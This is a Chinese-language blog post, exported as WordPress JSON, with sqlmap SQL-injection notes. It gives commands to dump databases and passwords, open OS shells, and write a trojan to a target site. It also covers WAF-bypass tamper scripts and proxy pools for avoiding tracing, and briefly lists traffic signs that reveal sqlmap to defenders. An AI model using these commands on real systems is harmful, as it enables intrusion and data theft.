    sqlmap -u \"\u7f51\u5740\"  -T \u8868\u540d   -C \u5217\u540d  --dump
    \u200b
    sqlmap -u \"\u7f51\u5740\"  -D \u6570\u636e\u5e93\u540d  --dump --batch
    \u200b
    sqlmap -u \"\u7f51\u5740\" --os -shell 
    \u200b<\/pre>\n\n\n\n
    2.\u8fdb\u9636\u547d\u4ee4<\/h6>\n\n\n\n
    \u8f93\u51fa\u4fe1\u606f\u7684\u8be6\u7ec6\u7a0b\u5ea6
    -V  #\u51717\u4e2a\u7ea7\u522b(0~6)\uff0c\u9ed8\u8ba4\u4e3a1
    #\u53ef\u4ee5\u7528-vv \u4ee3\u66ff-v 2,\u63a8\u8350\u4f7f\u7528\u8fd9\u79cd\u65b9\u6cd5
    0:\u53ea\u8f93\u51faPython\u51fa\u9519\u56de\u6eaf\u4fe1\u606f\uff0c\u9519\u8bef\u548c\u5173\u952e\u4fe1\u606f
    1:\u589e\u52a0\u8f93\u51fa\u666e\u901a\u4fe1\u606f\u548c\u8b66\u544a\u4fe1\u606f
    2:\u589e\u52a0\u8f93\u51fa\u8c03\u8bd5\u4fe1\u606f
    3:\u589e\u52a0\u8f93\u51fa\u5df2\u6ce8\u5165\u7684payloads
    4:\u589e\u52a0\u8f93\u51faHTTP\u8bf7\u6c42
    5:\u589e\u52a0\u8f93\u51faHTTP\u54cd\u5e94\u5934
    6:\u589e\u52a0\u8f93\u51faHTTP\u54cd\u5e94\u5185\u5bb9
    \u200b
    *\u68c0\u6d4b\u5f3a\u5ea6\u7b49\u7ea7
    -level1 \u68c0\u6d4bGet\u548cPost
    -level2 \u68c0\u6d4bHTTP Cookie
    -level3 \u68c0\u6d4bUser-Agent\u548cReferer
    -level4 \u68c0\u6d4b
    -level5 \u68c0\u6d4bHOST\u5934
    \u200b
    \u68c0\u6d4b\u98ce\u9669\u7b49\u7ea7
    -risk 2\u4f1a\u5728\u9ed8\u8ba4\u7684\u68c0\u6d4b\u4e0a\u6dfb\u52a0\u5927\u91cf\u65f6\u95f4\u578b\u76f2\u6ce8\u8bed\u53e5\u6d4b\u8bd5
    -risk 3\u4f1a\u5728\u539f\u57fa\u7840\u4e0a\u6dfb\u52a0OR\u7c7b\u578b\u7684\u5e03\u5c14\u578b\u76f2\u6ce8\uff0c\u53ef\u80fd\u4f1aupdate\u5bfc\u81f4\u4fee\u6539\u6570\u636e\u5e93
    \u200b
    \u6293\u5305\u65b9\u5f0f \u5728\u60f3\u8981\u6d4b\u8bd5\u7684\u540e\u9762\u52a0\u4e0a*
    -r\"\u8def\u5f84\"  --proxy\"\u4ee3\u7406\u8def\u5f84\"  --batch
    -u\"\u5730\u5740\"  --proxy\"\u4ee3\u7406\u8def\u5f84\"  --batch
    \u200b
    --user-agent \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\"   --batch 
    \u200b
    \u200b
    \u4ee3\u7406\u6c60
    proxyPool.py    \u722c\u53d6\u514d\u8d39\u4ee3\u7406      --redis 6379\u5b58\u50a8\u722c\u53d6\u514d\u8d39\u4ee3\u7406
    1.\u5b89\u88c5\u73af\u5883
    python -m pip install -r requirements.txt
    \u200b
    2.\u5f00\u542fredis(\u914d\u7f6e\u5bc6\u7801  -setting.py)
    \u200b
    3.\u722c\u53d6\u514d\u8d39\u6709\u6548\u7684\u4ee3\u7406ip
    python  proxypool.py schedule
    \u200b
    4.\u542f\u52a8api\u670d\u52a1
    python proxypool.py server
    \u200b
    Mytool  
    5.\u8bfb\u53d6\u722c\u51fa\u6765\u7684\u4ee3\u7406\u5e76\u4e14\u4fdd\u5b58\u5728ips.txt 
    python main.py  
    6.\u8fd0\u884c    \u6302\u51fa\u4ee3\u7406(127.0.0.1\uff1a9999)\uff08\u8f6e\u8be2)
    go2.py  
    \u5de5\u5177\u7aef\u53e3 5010
        <\/pre>\n\n\n\n
    3.\u6ce8\u5165\u6d41\u7a0b<\/h6>\n\n\n\n
    –batch \u9ed8\u8ba4yes<\/p>\n\n\n\n
    –prefix \u6ce8\u5165 payload \u7684\u524d\u7f00\u5b57\u7b26\u4e32 –suffix \u6ce8\u5165 payload \u7684\u540e\u7f00\u5b57\u7b26\u4e32 –tamper \u7528\u7ed9\u5b9a\u811a\u672c\u4fee\u6539\u6ce8\u5165\u6570\u636e<\/p>\n\n\n\n
    –dump-all \u5217\u51fa\u6240\u6709<\/p>\n\n\n\n
    –user-agent \u6d4f\u89c8\u5668\u4fe1\u606f<\/p>\n\n\n\n
    –proxy \u8bbe\u7f6e\u4ee3\u7406(\u7ed5waf \u9632\u6b62\u6eaf\u6e90)<\/p>\n\n\n\n
    –flush-session \u6e05\u7a7a\u4f1a\u8bdd\u6587\u4ef6<\/p>\n\n\n\n
    -v \u8be6\u7ec6\u7a0b\u5ea6 -level \u5f3a\u5ea6\u7b49\u7ea7 -risk \u98ce\u9669\u7b49\u7ea7<\/p>\n\n\n\n
    -u \"url\"    \u67e5\u770b\u662f\u5426\u5b58\u5728\u6ce8\u5165
    \u5bf9\u4e8e\u662fpost\u63d0\u4ea4\u6570\u636e\u7684URL\uff0c\u6211\u4eec\u9700\u8981\u6307\u5b9a\u5176data\u53c2\u6570(\u53ef\u4e0ebp\u8054\u7528\u66f4\u52a0\u5feb\u6377    \u6293\u5305\u4fdd\u5b58\u6570\u636e\u5305\u5230\u6587\u4ef6\u5939\u91cc\u9762)  
    -r \"\u6570\u636e\u5305\u5730\u5740\"   \u8bfb\u53d6\u6570\u636e\u62a5
    \u200b
    --current-user  \u67e5\u770b\u6570\u636e\u5e93\u5f53\u524d\u7528\u6237
    --is-dba    \u5f53\u524d\u7528\u6237\u662f\u5426\u6709\u7ba1\u7406\u6743\u9650
    --roles \u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272  --privileges    \u7528\u6237\u7279\u6743\u7ea7
    (--users          #\u5217\u6570\u636e\u5e93\u6240\u6709\u7528\u6237 
    --passwords      #\u6570\u636e\u5e93\u7528\u6237\u6240\u6709\u5bc6\u7801 )
    \u200b
    --current-db    \u67e5\u770b\u5f53\u524d\u6570\u636e\u5e93
    \u6839\u636e\u6240\u9700\u7206\u5e93 \u7206\u8868 \u7206\u5217\u540d \u7206\u6570\u636e \u6307\u5b9a
    -D \u6570\u636e\u5e93\u540d
    -T \u8868\u540d
    -C \u5217\u540d
    \u200b
    --sql-query     \u6307\u5b9a\u8981\u6267\u884c\u7684sql\u8bed\u53e5
    --sql-shell     \u8c03\u51fashell
    \u200b
    \u5b9e\u9645\u5e94\u7528\u573a\u666f
    \u4f2a\u9759\u6001\u6ce8\u5165
    -u url*.html --dbs  #\u5728html\u6269\u5c55\u540d\u524d\u52a0\u4e2a'*'
    \u200b
    \u6587\u4ef6\u64cd\u4f5c
    --is-dba        \u67e5\u770b\u6743\u9650    
    --fire-read '\u6587\u4ef6\u8def\u5f84'      \u8bfb\u53d6\u6587\u4ef6
    --fire-write=\u672c\u5730\u6728\u9a6c\u8def\u5f84 --file-dest=\u76ee\u6807\u7f51\u7ad9\u76ee\u5f55                <\/pre>\n\n\n\n
    4.\u7ed5\u8fc7waf<\/h6>\n\n\n\n
    --tamper
    --delay
    --proxy     
    \u200b
    tamper\u7528\u6cd5
    1.\u9488\u5bf9\u5f15\u53f7
    apostrophemask.py   \u5bf9\u5f15\u53f7\u8fdb\u884c utf-8 \u683c\u5f0f\u7f16\u7801
    apostrophenullencode.py \u7528\u975e\u6cd5\u7684\u53cc unicode \u5b57\u7b26 (%00%27) \u66ff\u6362\u5f15\u53f7\u5b57\u7b26
    \u200b
    2.\u9488\u5bf9\u5173\u952e\u5b57
    versionedmorekeywords.py    \u5bf9\u6bcf\u4e2a\u5173\u952e\u5b57\u8fdb\u884c\u6ce8\u91ca\u5904\u7406
    randomcomments.py   \u5728 payload \u7684\u5173\u952e\u5b57\u4e2d\u95f4\u968f\u673a\u63d2\u5165\u6ce8\u91ca\u7b26 \/**\/ \uff0c\u53ef\u7528\u4e8e\u7ed5\u8fc7\u5173\u952e\u5b57\u8fc7\u6ee4
    nonrecursivereplacement.py  \u5173\u952e\u5b57\u53cc\u5199\uff0c\u53ef\u7528\u4e8e\u5173\u952e\u5b57\u8fc7\u6ee4
    \u200b
    3.\u9488\u5bf9\u7a7a\u683c
    space2comment.py    \u7528\u6ce8\u91ca\u7b26 \/\/ \u4ee3\u66ff\u7a7a\u683c\uff0c\u7528\u4e8e\u7a7a\u683c\u7684\u7ed5\u8fc7
    space2plus.py   \u7528\uff0b\u53f7\u66ff\u4ee3\u7a7a\u683c
    \u200b
    4.\u6bd4\u8f83\u7b26
    between.py  \u7528between\u66ff\u4ee3\u5927\u4e8e\u53f7(>)
    greatest.py \u4e24\u8005\u6bd4\u8f83\u53d6\u5927\u503c
    \u200b
    charunicodeencode.py    \u5bf9\u5b57\u7b26\u4e32\u8fdb\u884c Unicode \u683c\u5f0f\u8f6c\u4e49\u7f16\u7801
    base64encode.py     \u7528 base64 \u683c\u5f0f\u8fdb\u884c\u7f16\u7801
    \u200b
    bluecoat.py         \u5bf9 SQL \u8bed\u53e5\u66ff\u6362\u7a7a\u683c\u5b57\u7b26\u4e3a (%09)\uff0c\u5e76\u66ff\u6362\u201d=\u201d\u2014>\u201dLIKE\u201d
    \u200b
    commalessmid    \u5c06 payload \u4e2d\u7684\u9017\u53f7\u7528 from \u548c for \u4ee3\u66ff\uff0c\u7528\u4e8e\u8fc7\u6ee4\u4e86\u9017\u53f7\u5e76\u4e14\u662f 3 \u4e2a\u53c2\u6570\u7684\u60c5\u51b5   \u5982substr()   mid()
    \u200b
    \u9488\u5bf9url
    charencode.py   \u91c7\u7528 url \u683c\u5f0f\u7f16\u7801 1 \u6b21
    chardoubleencode.py \u91c7\u7528 url \u683c\u5f0f\u7f16\u7801 2 \u6b21<\/pre>\n\n\n\n
    \u5982\u4f55\u68c0\u6d4b\u51fa\u4ec0\u4e48\u662fsqlmap\u7684\u6d41\u91cf\u7279\u5f81 –(\u6d41\u91cf\u68c0\u6d4b\u7cfb\u7edf\/\u65e5\u5fd7\u7cfb\u7edf)<\/p>\n\n\n\n
    1.\u6570\u636e\u5305\u662f\u5426\u5305\u542bsql\u6ce8\u5165\u8bed\u53e5 sql\u8bed\u53e5\u5b58\u5728\u4e00\u5b9a\u89c4\u5219<\/p>\n\n\n\n
    2.\u5982\u679c\u6ca1\u6709\u914d\u7f6e user_agent \u4f1a\u662f\u56fa\u5b9a\u7684sqlmap..<\/p>\n\n\n\n
    3.sqlmap \u968f\u673a\u6570\u7684\u4f4d\u6570\u6b63\u5e38\u662f\u56fa\u5b9a\u7684 \u4e00\u822c\u662f4<\/p>\n\n\n\n
    4.\u53d1\u5305\u901f\u5ea6\u662f\u89c4\u5f8b\u7684\/\u9891\u7387\u5feb(\u4ee3\u7406\u6c60)<\/p>\n\n\n\n
    \u9762\u8bd5\u9898?<\/p>\n\n\n\n
    \u5982\u4f55\u533a\u5206\u662fwindow\u7cfb\u7edf\u8fd8\u662flinux\u7cfb\u7edf<\/p>\n\n\n\n
    1.\u5927\u5c0f\u5199 (windows\u5bf9\u5927\u5c0f\u5199\u4e0d\u654f\u611f,linux\u662f\u4e25\u683c\u533a\u5206\u5927\u5c0f\u5199)<\/p>\n\n\n\n
    2.ping\u4e3b\u673a\u5224\u65ad (windows \u4e00\u822c\u60c5\u51b5\u4e0bTTL\u5927\u4e8e100 ,linux\u4e00\u822c\u60c5\u51b5\u4e0b\u5c0f\u4e8e100 )<\/p>\n\n\n\n
    \u8865:\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e<\/p>\n\n\n\n
    \u67e5\u770bMySQL\/data\/mysql\/user.MYD \u83b7\u53d6\u8d26\u6237\u5bc6\u7801\u767b\u5f55<\/p>\n","protected":false},"excerpt":{"rendered":"
    \u6570\u636e\u5e93\u8bed\u53e5mysql: select from table limit 5;mssql\/sqlsever: s … <\/p>\n","protected":false},"author":3,"featured_media":23,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-8","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-webtob10"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/8","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=8"}],"version-history":[{"count":3,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/8\/revisions"}],"predecessor-version":[{"id":18,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/8\/revisions\/18"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/23"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=8"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=8"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=8"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}